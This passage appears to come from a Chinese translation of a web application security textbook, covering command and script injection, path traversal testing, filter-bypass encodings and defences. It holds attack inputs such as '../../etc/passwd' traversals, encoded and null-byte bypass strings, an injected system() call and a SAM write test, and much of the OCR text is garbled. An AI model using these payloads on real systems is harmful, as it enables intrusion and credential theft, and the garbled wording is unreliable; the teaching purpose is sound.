(3) 监控 应 用 程序 的 啊 应 。 如 果 字 符 串 111111 被 单独 返回 ( 即 
它 前 面 没 有 其 他 命令 字符 串 ) ， 殊 表示 应 用 程序 可 能 易于 受到 脚本 
MEAS 

(4) 如 果 字 符 串 111111 并 未 返回 ， 寻 找 任何 表示 输入 被 动态 执 
行 的 错误 消息 ， 男 外 ， 可 能 需要 对 语法 进行 调整 ， 以 实现 注入 任意 
命令 的 目的 。 

(5) 如 果 攻 击 的 应 用 程序 使 用 PHP， 可 以 使 用 测试 字符 串 
phpinfo () “如 采 它 成 切合， 应 用 程序 将 巡回 PHP 涉 迹 的 配置 信 


(6) 如 果 应 用 程序 可 能 易于 受到 攻击 ， 与 前 面 描述 的 查找 OS 
命令 注入 漏洞 时 一 样 ， 注 入 一 些 道成 时 间 延 迟 的 命令 确认 这 一 点 。 
例如 : 

system('ping%20127.0.0.1') 


10.1.6 ”防止 OS 命令 注入 


通常 来 说 ， 防 止 OS 命 令 注 入 漏洞 的 最 住 方法 是 完全 避免 直接 调用 
操作 系统 命令 。 几 乎 Web 应 用 程序 所 需要 执行 的 每 个 任务 都 可 以 使 用 
内 置 API 完 成 ， 而 且 攻 击 者 无 法 控制 这 些 API， 使 其 执行 其 他 预料 之 外 


如 果 无 法 避免 要 在 传送 给 操作 系统 命令 解释 器 的 命令 字符 串 中 插 
入 用 户 提 区 的 数据 ， 应 用 程序 应 实施 严格 的 防御 来 防止 漏洞 发 生 。 如 
果 可 能 ， 应 使 用 一 份 “ 白 名 单 * 限 制 用 户 只 输入 一 组 特殊 的 值 。 或 者 ， 
应 将 输入 范围 限制 为 少数 字符 ， 例 如 ， 仅 字母 数字 字符 。 应 拒绝 包含 
任何 其 他 数据 (包括 任何 元 字符 或 空白 符 ) 的 输入 。 

应 用 程序 应 使 用 命令 API 通 过 它 的 名 称 和 命令 行 参数 启动 特殊 的 
进程 ， 而 不 是 问 支 持 命令 链接 与 重 定 同 的 shell 解 释 絮 传送 命令 字符 
串 ， 从 而 实施 男 一 层 保护 。 例 如 ，Java API Runtime.exec 和 ASP.NET 
API Process.Start 并 不 支持 shell 元 字符 ， 如 果 使 用 得 当 ， 它 们 能 够 确保 
P 想 要 执行 的 命令 。 请 参阅 第 19 章 了 解 与 命令 执行 API 有 

JJ 情 o 


10.1.7 ”防止 脚本 注入 漏洞 


通常 而 言 ， 防 止 脚本 注入 漏洞 的 最 佳 方法 是 ， 避 免 将 用 户 提交 的 
输入 或 者 来 自用 户 的 数据 传送 给 任何 动态 执行 或 包含 钞 数 。 如 有 果 由 于 
某 种 原因 必须 传送 用 户 提 交 的 输入 ， 那 么 应 对 相关 输入 进行 严格 的 确 
认 检 查 以 阻止 任何 攻击 。 如 有 可 能 ， 使 用 一 份 由 已 知 可 靠 的 值 组 成 
WAZA”, 并 拒绝 任何 没有 出 现在 这 个 名 单 上 的 输入 。 如 果 无 法 做 
到 这 一 点 ， 应 根据 一 组 已 知 无 害 的 字符 [如 字母 数字 字符 (空白 符 除 
Sh) ] 检 查 在 输入 中 使 用 的 字符 。 


10.2 径 


Web 应 用 程序 中 的 许多 功能 通 稼 都 需要 处 理 用 户 以 文件 或 目录 名 
提交 的 输入 。 一 般 情 况 下 ， 这 些 输入 会 传递 给 接受 文件 路 径 的 API 
(例如 ， 用 于 检索 本 地 文件 系统 中 的 文件 ) 。 应 用 程序 将 在 它 对 用 户 
请 求 的 啊 应 中 处 理 该 API 调 用 的 结果 。 如 采用 户 提 区 的 输入 未 经 过 正 
确 确 认 ， 这 种 行为 吕 可 能 导致 各 种 安全 漏洞 ， 其 中 最 遂 见 的 是 文件 路 
径 遍 历 漏洞 和 文件 包 人 台 漏 洞 。 


如 果 应 用 程序 使 用 用 户 可 控制 的 数据 、 以 危险 的 方式 访问 位 于 应 
用 程序 服务 右 或 其 他 后 端 文件 系统 中 的 文件 和 目录 ， 束 会 出 现 路 径 人 远 
历 漏洞 。 通 过 提交 专 | 设计 的 输入 ， 攻 击 者 殊 可 以 在 被 访问 的 文件 系 
统 中 读 取 或 者 写 入 任意 内 容 。 这 种 漏洞 往往 使 攻击 者 能 够 从 服务 器 上 
读 取 敏感 信息 或 者 重 写 敏 感 文件 ， 并 最 终 在 服务 右上 执行 任何 命令 。 

在 下 面 的 示例 中 ， 应 用 程序 使 用 一 个 动态 页 面 问 客户 端 返 回 静 态 
图 像 。 被 请 求 图 像 的 名 称 在 查询 子 符 串 参数 中 指定 : 


http://mdsec.net/fLilestore/8/GetFile.ashx?iilename-keira. jpg 


当 服 务 絮 处 理 这 个 请 求 时 ， 它 执行 以 下 操作 。 

(1) 从 查询 字符 串 中 提取 filename 参 数值 。 

(2) 将 这 个 值 附 加 在 C:filestore\ 之 后 。 

(3) 用 这 个 名 称 打开 文件 。 

(4) 读 取 文 件 的 内 容 并 将 其 返回 给 客户 端 。 

漏洞 之 所 以 会 发 生 ， 是 因为 攻击 者 可 以 将 路 径 遍 历 序列 (path 
traversal sequence) 放 入 文件 名 内 ， 从 第 (2) 步 指定 的 图 像 目 录 向 上 
回溯 ， 从 而 访问 服务 左上 的 任何 文件 。 众所周知， 路 径 过 历 序列 表示 
为 “点 一 点 一 斜 线 ”(.，， 一 个 典型 的 攻击 如 下 : 


http: //mdsec.net/filestore/8/GetPile.ashx?filename=..\windows\win.ini 


如 打 应 用 程序 把 flename 人 参数 的 值 附加 到 图 像 目 孙 名 称 之 后 ， 残 得 
到 以 下 路 径 : 


C:\filestore\..\windows\win. ini 


A Si PP SB AR REAC: Sheek A ae, Al 
此 前 面 的 路 径 等 同 于 以 下 路 径 : 


C:\windows\win.ini 


因此 ， 服 务 器 不 会 返回 图 像 文 件 ， 而 是 返回 默认 的 Windows 配 置 
Hee 


T/ 注解 在 旧版 Windows IIS Web 服 务 器 中 ， 默 认 情况 下 ， 应 


用 程序 将 在 本 地 系统 权限 下 运行 ， 因 而 能 够 访问 本 地 文件 系统 上 的 
任何 可 读 文 件 。 在 较 新 的 版 本 中 ， 和 许多 其 他 Web 服 务 絮 一 样 ， 服 


务 絮 进程 默认 以 权限 较 低 的 用 尸 账户 运行 。 因此， 在 探查 路 径 裔 历 
漏洞 时 ， 最 好 是 请 求 一 个 可 由 任何 类 型 的 用 户 读 取 的 默认 文件 ， 如 


c:\windows\win.ini ° 


FLIX ial ANP, DRE PRS te, BELE RR A 
击 。 然 而 ， 由 于 这 些 攻击 早已 广为人知 ， 应 用 程序 通常 会 针对 它们 实 
施 各 种 防御 ， 大 多 数 情况 下 是 采取 输入 确认 过 小。 在 后 文中 会 讲 到 ， 
这 些 过 滤 往 往 并 不 可 靠 ， 可 说 技术 熟练 的 攻击 者 轻易 避 开 。 


尝试 访问 


http://mdsec.net/filestore/8/ 


1. 查找 和 利用 路 径 过 历 漏洞 

许多 功能 都 要 求 Web 应 用 程序 根据 用 户 在 请 求 中 提交 的 参数 癌 文 
件 系统 读 取 或 写 入 数据 。 如 采 以 不 安全 的 方式 执行 这 些 操 作 ， 攻 击 痢 
束 可 以 提交 专门 设计 的 输入 ， 使 应 用 程序 访问 开发 者 并 不 希望 它 访问 
的 文件 。 这 类 漏洞 称 为 路 径 遍 历 (path traversal) 漏洞 ， 攻 击 者 可 利用 
这 种 漏洞 读 取 密码 和 应 用 程序 日 志 之 类 的 敏感 数据 ， 或 者 重 写 安 全 性 
至 关 重 要 的 数据 项 ， 如 配置 文件 和 软件 代码 。 在 了 最 为 挛 重 的 情况 下 ， 
这 种 漏洞 可 使 攻击 者 能 够 完全 攻破 应 用 程序 与 基础 操作 系统 。 

有 时 ， 路 径 过 历 漏洞 很 难 发 现 ， 并 且 许 多 Web 应 用 程序 对 它们 实 
施 的 防御 也 十 分 脆弱 。 下 面 我 们 将 介绍 攻击 者 在 确定 潜在 的 目标 、 探 
查 易 受 攻 击 的 行为 、 避 开 应 用 程序 防御 以 及 处 理 定 制 编码 的 过 程 中 所 
采用 的 各 种 技巧 。 

o ”确定 攻击 目标 

在 对 应 用 程序 进行 初步 解析 的 过 程 中 ， 应 该 已 经 确定 了 所 有 与 路 
径 遍 历 漏洞 有 关 的 明显 受 攻击 面 。 主 要 用 于 文件 上 传 或 下 载 目 的 的 所 
有 功能 都 应 进行 全 面 测试 用户 可 共 吾 文档 的 工作 流程 应 用 程序 ， 多 
许 用 户 上 传 图 像 的 博客 与 担 卖 应 用 程序 ， 以 及 为 用 户 提 供电 子 书 、 技 
术 手 册 和 公司 报表 等 文档 的 信息 型 应 用 程序 ， 第 第 使 用 这 种 功能 。 

除 这 种 明显 的 目标 功能 外 ， 还 有 其 他 各 种 行为 表示 应 用 程序 需要 
与 文件 系统 进行 交互 。 


渗透 测试 步骤 
GD 分 析 在 应 用 程序 解析 过 程 中 收集 到 的 信息 ， 确 定 以 下 内 
” 口 请 求 参数 中 明显 包含 文件 或 目录 名 称 的 所 有 情形 。 例 


如 ，include=main.inc 或 template= /en/sidebar ° 
口 需要 从 服务 器 文件 系统 (相对 于 后 端 数据 库 ) 读 取 数据 
的 所 有 应 用 程序 功能 。 例 如 ， 显 示 办 公文 档 或 图 像 。 
(2) 在 测试 其 他 漏洞 的 过 程 中 ， 寻 找 有 益 的 错误 消息 或 其 他 
反常 事件 。 设 法 确定 用 户 提 交 的 数据 被 传送 给 文件 API 或 作为 操作 
系统 命令 参数 的 所 有 情况 。 


vV fen 如 果 攻 击 者 已 经 从 本 地 访问 应 用 程序 | 通过 了 白 盒 
测试 (white-box testing) ， 或 者 因为 已 经 攻破 了 服务 器 的 操作 系 
Sil ， 那 么 往往 能 够 直接 确定 路 径 遇 历 目 标 ， 因 为 他 可 以 监控 应 用 
程序 与 文件 系统 之 间 的 全 部 交互 。 


渗透 测试 步骤 


如 有 果 能 够 从 本 地 访问 应 用 程序 ， 执 行 以 下 操作 。 
(1) 使 用 适当 的 工具 监控 服务 器 上 的 所 有 文件 系统 活动 。 例 
如 ， 可 以 在 Windows 平 台 上 使 用 SysInternals 开 发 的 FileMon 工 具 ， 在 
Linux 平 台 上 使 用 ltrace/strace 工 具 ， 在 Sun Solaris 平 台 上 使 用 truss 命 
A o 


A 

(2) 在 每 一 个 被 提交 的 参数 (包括 全 部 cookie、 查 询 字 符 串 字 
段 和 POST 数据 项 ) 中 插入 一 个 特殊 的 字符 串 (如 traversaltest) 测试 
应 用 程序 的 每 一 个 页 面 。 一 次 仅 针 对 一 个 参数 进行 测试 ， 并 使 用 第 
14 草 描述 的 目 动 技 巧 加 速 测试 过 程 。 

(3) 在 文件 系统 监控 工具 中 设置 一 个 过 小 器， 确定 所 有 包含 
测试 字符 串 的 文件 系统 事件 。 

(4) 如 果 发 现 测试 字符 串 被 用 作文 件 或 目录 ， 或 者 出 现在 文 
件 或 上 日 录 名 中 ， 那 么 对 每 一 种 情况 进行 测试 CP Art) ， 确 定 其 
是 否 易 于 受到 路 径 裔 历 攻 击 。 


o 探查 路 径 过 历 漏洞 
确定 各 种 湾 在 的 路 径 志 有 历 测 斌 目标 后 ， 必 须 分 别 测试 每 种 情况 ， 
ene 以 不 安全 的 方式 向 相关 文件 系统 操作 传送 用 户 可 控制 的 数 


在 测试 用 户 提 交 的 参数 时 ， 需 确定 裔 历 序 列 是 否 被 应 用 程序 阻 
ik, 或 者 它们 是 否 能 够 正常 工作 。 通 第 ， 提 交 不 会 同上 回潮 到 起 始 目 
永 的 遍历 序列 是 一 种 较为 可 靠 的 初步 测试 方法 。 


渗透 测试 步骤 


(1) 假设 所 针对 的 参数 被 附加 到 应 用 程序 预先 设 定 的 目录 之 
后 ， 那 么 插入 任意 一 个 子 目 录 和 一 个 吉 历 序列 ， 修 改 参数 的 值 。 例 
如 ， 如 果 应 用 程序 提交 参数 


file=foo/filel.txt 


那么 可 以 尝试 提交 以 下 值 : 
file=foo/bar/../filel.txt 


QUA PAR TL PRET ASCE], NE DT CBI 
ee enero nae 
同 的 文件 * 

(2) 在 上 述 两 种 情况 下 ， 如 果 应 用 程序 的 行为 有 所 不 同 ， 那 
么 应 用 程序 可 能 阻止 、 删 除 或 净化 过 历 序列 ， 致 使 文件 路 径 失 效 。 
需要 研究 是 否 可 通过 其 他 方法 避 开 应 用 程序 的 确认 过 滤 (请 参阅 下 
面 讨 论 的 内 容 ) ° 

即使 子 目 录 “bar” 并 不 存在 ， 这 个 测试 仍然 有 效 ， 因 为 大 多 数 文 
件 系 统 在 笑 试 获取 文件 路 径 前 对 其 进行 了 规范 化 。 路 径 序列 删除 了 
虚构 的 目录 ， 因 此 服务 器 并 不 检查 它 是 否 存 在 。 


如 有 果 发 现 提 交融 历 序 列 但 不 向 上 回溯 至 起 始 目 录 不 会 影响 应 用 程 
序 的 行为 ， 那 么 在 接 下 来 的 测试 中 ， 应 该 洽 试 笛 历 出 起 始 目 未 ， 从 服 
务 器 文件 系统 的 其 他 地 方 访问 文件 。 


渗透 测试 步骤 


(1) 如 果 所 攻击 的 应 用 程序 功能 只 拥有 文件 读 取 访 问 权 限 ， 
那么 莹 试 访问 相关 操作 系统 上 的 一 个 已 知 任何 用 户 均 可 读 取 的 文 
件 。 提 交 下 面 其 中 一 个 值 作为 受 控 制 的 文件 名 参数 : 


Fi f m + ~ > = 
m / ee / ae / ee / ee / ee / ee / Ores siete / ee etc/passwd 


/ pe e a Aina Lee /AAONS /In 


幸运 的 话 ， 浏览 器 将 显示 请 求 的 文件 的 内 容 ， 如 图 10-5 所 示 。 
TE TE 
TE ot. 


See iy Meike oe otis ./../../../etc/passwd 
| A ahs We ./../../../windows/win.ini 


图 10-5 ”成 功 的 路 径 遍 历 攻 击 


f> 
ots 


(2) 如 果 所 攻击 的 功能 拥有 文件 写 入 访问 权限 ， 那 么 要 最 终 
确定 应 用 程序 是 否 易于 受到 攻击 ， 可 能 会 更 困难 。 通 常 ， 一 种 有 效 
的 测试 是 竹 试 写 入 两 个 文件 ， 一 个 文件 可 被 任何 用 户 写 入 ， 男 一 个 
文件 即使 是 根 用 户 或 管理 员 也 禁止 写 入 。 例 如 ， 在 Windows 平 台 上 
可 以 笑 试 写 入 下 面 两 个 文件 : 


ritetesc.txt 
windows/system32/config/sam 


yan 禁止 根 用 户 写 入 的 文件 取决 于 使 用 的 平台 版 
本 ， 但 尝试 用 一 个 文件 重 写 一 个 目录 绝 不 可 能 取得 成 功 ， 因 此 可 以 
进行 以 下 尝试 

NAC Re eer Hd ed tay Cae /tmp/writetest.txt 

Sy eee lone eee ay eee ie fire aw ee /tmp 


在 上 面 的 每 对 测试 中 ， 如 果 应 用 程序 在 响应 两 个 请 求 时 表现 出 
行为 差异 例如， 响应 第 二 个 请 求 时 返回 一 条 错误 消息 ， 而 响应 第 
一 个 请 求 时 不 返回 错误 消息 ) ， 那 么 应 用 程序 可 能 易于 受到 攻击 。 

(3) 还 有 另 一 种 方法 可 通过 写 入 访问 确定 遍历 漏洞 ， 即 尝试 
在 Web 服 务 絮 的 Web 根 目录 中 写 入 一 个 新 文件 ， 然 后 竹 试 通过 浏 宽 


如 获得 这 个 文件 。 但 是 ， 如 有 果 并 不 知道 Web 根 目录 的 位 置 ， 或 者 访 
问 文 件 的 用 户 并 不 拥有 写 入 权限 ， 这 种 方法 可 能 不 会 成 功 。 


T 注解 几乎 每 一 种 文件 系统 都 接受 试图 向 上 回溯 到 文件 系 


统 根 目 录 的 多 余 遍 历 序列 。 因 此 ， 当 探查 漏洞 时 ， 像 在 上 面 的 示例 
中 一 样 ， 最 好 提交 大 量 的 遍历 序列 。 附 加 数据 的 起 始 目录 可 能 位 于 


文件 系统 的 “ 深 处 ”"， 因 此 使 用 大 量 的 序列 有 助 于 避免 错误 警报 。 

而 且 ，Windows 平 台 接 受 斜 线 (/) AUR V 作为 目录 分 隔 
符 ， 而 UNIX 平 台 只 接受 斜 线 作为 分 隔 符 。 另 外 ， 一 些 Web 应 用 程序 
过 滤 两 者 之 一 。 即 使 完全 确信 Web 服 务 器 运行 的 是 UNIX 操 作 系 统 ， 
但 应 用 程序 仍然 可 能 被 Windows 后 端 组 件 调用 。 为 此 ， 当 探查 遍历 
漏洞 时 ， 最 好 两 者 都 进行 测试 。 


e EI ED Ah a 

最 初 的 裔 历 攻击 尝试 (如 前 所 述 ) 并 未 成 功 ， 并 不 意味 着 应 用 程 
序 不 容易 受到 攻击 。 许 多 应 用 程序 开发 者 意识 到 路 径 志 历 漏洞 ， 并 执 
行 各 种 输入 确认 检查 竹 试 防止 这 种 漏洞 。 但 是 ， 这 些 防御 措施 往往 存 
在 缺陷 ， 可 被 拉 术 熟练 的 攻击 者 轻易 避 开 。 

第 一 种 第 见 的 输入 过 滤 方 法 如 下 ， 首 移 检查 文件 名 参数 中 是 否 存 
AME mA, WIRE, RAT SA aK, 
么 笑 试 删除 该 序列 ， 以 对 输入 进行 净化 。 这 种 类 型 的 过 滤 往 往 易于 受 
到 各 种 攻击 ， 它 们 使 用 编码 或 其 他 方法 来 避 开 过 滤 。 这 类 攻击 全 都 利 
用 输入 确认 机 制 所 面临 的 规范 化 问题 ， 我 们 在 第 2 章 已 经 讲 过 。 


渗透 测试 步骤 


(1) 


E RA ES EF RR I RAY a A J PP IETA 


试 。 许 多 输入 过 滤 仅 检查 其 一 种 序列 ， 而 文件 系统 却 文 持 全 部 两 种 


序列 六 


(2) 演 试 使 用 下 面 的 编码 方案 ， 对 裔 历 序列 进行 简单 的 URL 


编码 。 一 定 要 对 输入 中 的 每 个 斜 线 与 点 进行 编码 : 


日 点 一 一 $2e 

O Hk a2f 

O meee 一 一 %5c 

尝试 使 用 下 面 的 16 位 Unicode 编 码 : 
口 点 一 一 %u002e 

口 射 线 一 一 %u2215 

O RFH 一 一 3u2216 


尝试 使 用 下 面 的 双 倍 URL 编 码 : 
日 点 一 一 %252e 

O 斜 线 一 一 %252f 

O 反 斜 线 一 一 8255c 


(5) 尝试 使 用 下 面 的 超 长 UTF-8 Unicode 编 码 : 


ml sc08s2e、g8e0sd40sae、g&coae 等 
口 Hee sc0saf、se08s80saf、8c082E 等 
口 Ree sc0s5c、sgc0s808s5c 等 


可 以 在 Burp Intruder 中 使 用 非法 Unicode 有 戏 载 倚 类 型 为 任何 特 
殊 字符 生成 大 量 其 他 形式 的 表示 法 ， 并 将 它 提交 到 目标 参数 的 相关 
位 置 。 这 些 表 示 法 严重 违反 了 Unicode 表 示 法 规则 ， 但 却 为 许多 
Unicode 解 码 器 接受 ， 特 别 是 Windows 平 台 上 的 解码 器 。 
(6) 如 果 应 用 程序 党 试 通 过 删除 过 历 序列 来 净化 用 户 输 入， 
但 没有 以 递归 的 方式 应 用 这 种 过 滤 ， 那 么 可 以 用 一 个 序列 替换 另 一 
个 序列 来 避 开 过 滤 。 例 如 ; 


试 访问 


http://mdsec.net/filestore/30/ 


http://mdsec.net/filestore/39/ 
http://mdsec.net/filestore/46/ 
http://mdsec.net/filestore/59/ 
http://mdsec.net/filestore/65/ 


B PPD BLE oo OO aA, eA A Pe 0 
的 输入 是 否 包含 应 用 程序 想 要 的 后 级 (如 文件 类 型 ， 或 前 缀 (如 起 始 
目录 ) 。 这 种 类 型 的 防御 可 以 与 前 面 描述 的 过 滤 联 合 使 用 。 


渗透 测试 步骤 


(1) 一 些 应 用 程序 检查 用 户 提交 的 文件 是 否 以 一 种 或 一 组 特 
殊 的 文件 类 型 结尾 ， 并 拒绝 访问 其 他 内 容 的 请 求 。 有 时 候 ， 可 以 在 
请 求 的 文件 名 后 放 入 一 个 URL 编 码 的 空 字 节 ， 在 后 面 连接 应 用 程序 
接受 的 文件 类 型 ， 从 而 避 开 这 种 检查 。 例 如 : 


../../../../../boot.inig00.jpd 


这 种 攻击 有 时 会 成 功 ， 是 因为 应 用 程序 使 用 API 在 托管 执行 环 

境 下 执行 文件 类 型 检查 ， 该 执行 环境 允许 字符 串 包含 空 字符 (如 
Java 中 的 String.endsWith () ) 。 但 是 ， 当 获取 文件 时 ， 应 用 程序 最 
终 在 一 个 无 法 控制 的 环境 (其 中 的 字符 串 以 空白 字符 结束 ) 中 使 用 
API， 因 此 文件 名 被 截 短 为 想 要 的 值 。 

(2) 一 些 应 用 程序 将 它们 自己 的 文件 类 型 后 缀 附加 在 用 户 提 
区 的 文件 名 后 ， 尝 斌 控制 被 访问 的 文件 类 型 。 在 这 种 情况 下 ， 基 于 
相同 的 原因 ， 前 面 的 任何 一 种 利用 都 可 能 取得 成 功 。 

(3) 一 些 应 用 程序 检查 用 户 提交 的 文件 名 的 开头 部 分 是 否 为 
起 始 目 录 的 某 一 个 子 目 录 ， 或 者 一 个 特殊 的 文件 名 。 当 然 ， 通 过 以 
下 方法 可 轻易 避 开 这 种 检查 : 


filestore/../../../../../../../etc/passwd 


(4) 如 果 以 上 针对 输入 过 滤 的 攻击 都 无 法 成 功 ， 可 能 应 用 程 
序 实 施 了 儿 种 类 型 的 过 滤 ， 因 此 需要 同时 使 用 上 面 的 几 种 攻击 方法 
(同时 针对 裔 历 序列 过 滤 与 文件 类 型 或 目录 过 小) 。 遇 到 这 种 情 
况 ， 如 有 可 能 ， 最 好 的 办 法 古 将 问题 分 解 成 几 个 独立 的 阶段 。 例 
如 ， 如 采 请 求 
能 够 成 功 ， 但 请 求 


foo/../diagraml . jpg 


HEAR, MBAR AEA ATA A REM a, EBS — “Mak 
ARE DA © HOARE AT EE TA a a Fe I PATE 


问 /etc/passwd， 束 请 求 以 下 文件 ， 检 查 应 用 程序 是 否 实施 任何 文件 
类 型 过 滤 ， 以 及 是 否 可 以 避 开 这 种 过 小 : 


diagraml. jpg%00.jpg 


彻底 检查 应 用 程序 定义 的 起 始 目 孙 ， 设 法 了 解 它 实施 的 全 部 过 
滤 ， 看 是 否 可 以 利用 上 述 技 巧 避 开 每 一 种 过 滤 。 

(5) 当然 ， 如 果 能 够 随意 访问 应 用 程序 ， 那 么 攻击 就 变 得 更 
加 简单 ， 因 为 渗透 测试 员 可 以 系统 性 地 攻击 每 种 输入 ， 并 最 终 确 定 
通过 哪些 文件 名 (如 果 有 ) 可 以 到 达 文 件 系统 。 


@ 处理 定制 编码 

我 们 曾经 见 到 ， 应 用 程序 采用 的 文件 名 编码 方案 最 终 以 危险 的 方 
式 进 行 处 理 ， 模 糊 处 理 也 不 能 提供 任何 安全 保障 ， 这 时 就 会 出 现 最 为 
可 怕 的 路 径 裔 历 漏洞 。 

例如 ， 一 些 应 用 程序 具有 某 种 工作 流程 功能 ， 人 允许 用 户 上 传 与 下 
载 文件 。 执 行 上 传 操作 的 请 求 提 供 一 个 文件 名 参数 ， 它 在 写 入 文件 时 
易于 受到 路 径 轴 历 攻 击 。 如 果 一 个 文件 成 功 上 传 ， 那 么 应 用 程序 再 为 
用 户 提 供 一 个 下 载 URL。 这 里 有 两 点 值得 注意 。 

口 应 用 程序 核对 将 要 写 入 的 文件 是 否 已 经 存在 ， 如 果 存 在 ， 职 拒 
绝 重 写 这 个 文件 。 

口 为 下 载 用 户 文 件 而 生成 的 URL 使 用 一 种 定制 模糊 处 理 方案 表 
示 。 这 种 方案 似乎 是 一 种 定制 的 Base64 编 码 形式 ， 它 在 每 个 编码 文件 
名 位 置 使 用 一 组 不 同 的 字符 。 

总 的 来 说 ， 这 些 注意 点 给 直接 利用 漏洞 设立 了 障碍 。 首 先 ， 尽 管 
能 够 在 服务 恬 文 件 系统 中 写 入 任何 文件 ， 但 攻击 者 却 无 法 重 写 任 何 现 
有 的 文件 ， 而 且 ，Web 服 务 器 进程 拥有 的 较 低 权限 意味 着 攻击 者 不 可 
能 在 任何 有 利 位 置 创建 新 文件 。 其 次 ， 如 果 不 对 定制 编码 进行 逆 癌 工 
程 ， 攻 击 者 也 不 可 能 请 求 任意 一 个 现 有 的 文件 (如 /etc/passwd) ° 

一 个 简单 的 实验 就 可 以 证 明 模 糊 处 理 后 的 URL 包 含有 用户 最 初 提 交 
的 文件 名 字符 串 ， 如 下 所 示 。 

O test .txt 变 成 zM1YTU4NTY2Y。 


口 foo/../test.txt 变 成 EI1NzUyMzE02zjQ0NjMZzND。 


编码 后 的 URL 之 间 的 长 度 差异 表明 ， 在 应 用 编码 之 前 ， 应 用 程序 
并 未 对 其 进行 路 径 规 范 化 。 这 种 行为 让 攻击 者 有 机 会 对 漏洞 加 以 利 


用 。 首 先 通过 以 下 名 称 提交 一 个 文件 : 
ESG 
它 的 规范 化 形式 为 : 
/tmp/foo 


ACH] DLR WebARS a8 A o ERAIN FR ERA FEAR 
文件 名 的 下 载 URL: 


FnwUk1lrNXFUVEJOZWLKNIRsUk5SNaz E2VLRKTmFrMEGUDXBWZWs1N1ldYazZ51lb 


要 修改 这 个 值 以 返回 文件 /etcpasswd， 只 需 从 右边 将 其 截 短 成 
FnwUK1LrNXFUVEJUOZW1KkN1LRSUK5SNazE2V1RKTmFYM 


果然 ， 尝 斌 使 用 这 个 值 下 载 文 件 时 ， 结 果 返 回 服务 器 的 passwd 文 
件 。 这 说 明 ， 服 务 占 为 攻击 者 提供 了 足够 的 资源 ， 即 使 不 解 译 模 糊 处 
理 算法 ， 攻 击 者 也 可 以 使 用 它 的 编码 方案 编码 任意 文件 路 径 。 


TZ 注解 细心 的 读者 可 能 已 经 注意 到 ， 在 上 传 的 文件 名 中 出 
现 了 一 个 多 余 的 ,'。 这 样 做 是 必要 的 ， 因 为 它 可 确保 蕉 短 后 的 URL 


符合 Base64 编 码 规则 ， 在 3 字 下 的 明文 边界 结束 ， 并 因此 在 4 字 的 
编码 文本 边界 结束 。 在 服务 器 上 解码 时 ， 从 一 个 编码 块 的 中 间 截 取 
URL 几乎 肯定 会 造成 错误 。 


o FHH imi] 

REP FY HARA ar SOE ARS E AMEEN Yia 
洞 后 ， 渗 透 测 试 员 应 当 实 施 哪 种 攻击 利用 这 些 漏洞 呢 ? 许多 时 候 ， 在 
文件 系统 上 拥有 和 Web 服 务 右 进程 相同 的 读 取 / 写 入 权限 。 


渗透 测试 步骤 


可 以 利用 读 取 访问 路 径 遇 历 漏 洞 从 包含 有 用 信息 的 服务 右上 获 
取 有 益 的 文件 ， 或 者 帮助 优化 针对 其 他 漏洞 的 攻击 。 如 下 所 示 。 
口 操作 系统 与 应 用 程序 的 密码 文件 。 
口服 务 邵 与 应 用 程序 配置 文件 ， 以 发 现 其 他 漏洞 或 优化 另 一 次 


口 可 能 舍 有 数据 库 证 书 的 包含 文件 。 
口 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数据 库 文 件 或 XML 文 


fe? 


口服 务 絮 可 执行 页 面 的 产 代 码 ， 以 执行 代码 审查 ， 搜 索 漏 洞 
(例如 GetImage.aspx?file=GetImage.aspx) ° 
口 可 能 包含 用 户 名 和 会 话 令 牌 的 应 用 程序 日 志文 件 等 。 

如 果 发 现 一 个 允许 写 入 访问 的 路 径 遇 历 漏洞 ， 那 么 渗透 测试 的 
主要 目标 应 该 是 利用 它 在 服务 器 上 执行 任意 命令 。 利 用 漏洞 实现 这 
一 目标 的 方法 包括 以 下 几 种 。 

口 在 用 户 的 局 动 文 件 夹 中 创建 脚本 。 

口 当 用 户 下 一 次 连接 时 ， 修 改 in.ftpd 等 文件 执行 任意 命令 。 

向 一 个 拥有 执行 许可 的 Web 目 录 写 入 脚本 ， 从 浏览 器 调用 它 
Lh 


2. 防止 路 径 饥 历 漏洞 

迄今 为 止 ， 避 免 问 任何 文件 系统 API 传 送 用 户 提交 的 数据 是 防止 
路 径 遍 历 漏洞 的 最 有 效 方法 。 许 多 时 候 ， 包 含 在 最 初 的 GetIfile.aspx? 
filename=keira.jpg 示 例 中 ， 应 用 程序 完全 没有 必要 实施 防御 。 因 为 大 
多 数 文件 都 没有 采用 访问 控制 ， 攻 击 者 可 将 这 些 文件 存 入 Web 根 目录 
中 ， 再 通过 URL 和 直接 访问 。 如 果 以 上 方法 行 不 通 ， 应 用 程序 可 能 会 保 
存 一 个 可 由 页 面 处 理 的 硬 编码 图 像 文 件 列 表 ， 并 使 用 不 同 的 标识 符 
(如 一 个 索引 号 指定 需要 的 文件 。 任 何 包含 无 效 标识 符 的 请 求 都 可 
i ee ree E 
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有 了 时， 与 实现 文件 上 传 与 下 载 的 工作 流程 功能 一 样 ， 应 用 程序 可 
能 需要 人 允许 用 户 通 过 名 称 指定 文件 ， 这 时 ， 开 发 者 可 能 采用 最 简单 的 
办 法 ， 将 用 户 提 交 的 用 户 名 传送 给 文件 系统 API， 从 而 达到 这 种 日 
的 。 在 这 种 情况 下 ， 应 用 程序 应 实施 深层 防御 措施 ， 为 路 径 遇 历 攻 击 
设立 几 层 障碍 。 

以 下 是 一 些 可 能 有 用 的 防御 方法 ， 在 应 用 过 程 中 ， 最 好 将 它们 组 
合 在 一 起 使 用 。 

口 对 用 户 提 交 的 文件 名 进行 相关 人 解码 与 规范 化 之 后 ， 应 用 程序 应 
仿 查 该 文件 名 是 否 包 含 路 径 遍 历 序 列 (使 用 反射 线 或 斜 线 ) 或 空 字 
节 。 如 果 是 这 样 ， 应 用 程序 应 停止 处 理 请 求 。 不 得 尝试 对 恶意 文件 名 
进行 任何 净化 处 理 。 

a 应 用 程序 应 使 用 一 个 人 硬 编 码 的 、 人 允许 访问 的 文件 类 型 列表 ， 并 
拒绝 任何 访问 其 他 文件 类 型 的 请 求 〈 完 成 上 述 解 码 与 规范 化 之 后 ) 。 

口 对 用 户 提 交 的 文件 名 进行 一 切 必 要 的 过 滤 后 ， 应 用 程序 应 使 用 
适当 的 文件 系统 API 确认 是 否 一 切 正常 ， 以 及 使 用 该 文件 名 访问 的 文 
件 是 否 位 于 应 用 程序 指定 的 起 始 目 录 中 。 

在 Java 中 ， 可 通过 使 用 用 户 提交 的 文件 名 示例 一 个 java.io.File 
对 象 ， 然 后 对 这 个 对 象 调 用 getCanonicalPath 方 法 ， 即 可 达到 上 壕 
